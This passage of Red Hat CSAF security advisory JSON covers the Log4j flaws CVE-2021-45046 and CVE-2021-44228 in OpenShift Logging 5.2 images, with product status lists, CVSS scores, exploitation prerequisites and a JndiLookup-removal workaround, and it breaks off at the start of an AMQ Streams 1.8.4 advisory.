"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" }, { "cve": "CVE-2021-45046", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-12-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", 
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", 
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2032580" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. 
A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)", "title": "Vulnerability summary" }, { "category": "other", "text": "We have matched Apache\u0027s CVSS score, with the exception of the scope metric, which will remain unaltered at \"unchanged\", as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n\nWe have given this vulnerability an impact rating of Moderate because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability.\nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects log4j versions between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability.\n\nPrerequisites to exploit this flaw are:\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup e.g. ($${ctx:loginId})\n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.formatMsgNoLookups` to `true`) does NOT mitigate this specific vulnerability. 
\nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", 
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", 
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-45046" }, { "category": "external", "summary": "RHBZ#2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046", "url": "https://www.cve.org/CVERecord?id=CVE-2021-45046" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046" }, { "category": 
"external", "summary": "https://access.redhat.com/security/cve/CVE-2021-44228", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4", "url": "https://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T18:38:45+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.2, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html", "product_ids": [ "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5127" }, { "category": "workaround", "details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath 
(example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).", "product_ids": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", 
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", 
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", 
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", 
"8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] } ], "threats": [ { "category": "exploit_status", "date": "2023-05-01T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)" } ] }
rhsa-2021_5138
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Red Hat AMQ Streams 1.8.4 is now available from the Red Hat Customer Portal.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency. \n\nThis release of Red Hat AMQ Streams 1.8.4 serves as a replacement for Red Hat AMQ Streams 1.8.0, and includes security and bug fixes, and enhancements.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5138", "url": "https://access.redhat.com/errata/RHSA-2021:5138" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.amq.streams\u0026version=1.8.4", "url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.amq.streams\u0026version=1.8.4" }, { "category": "external", 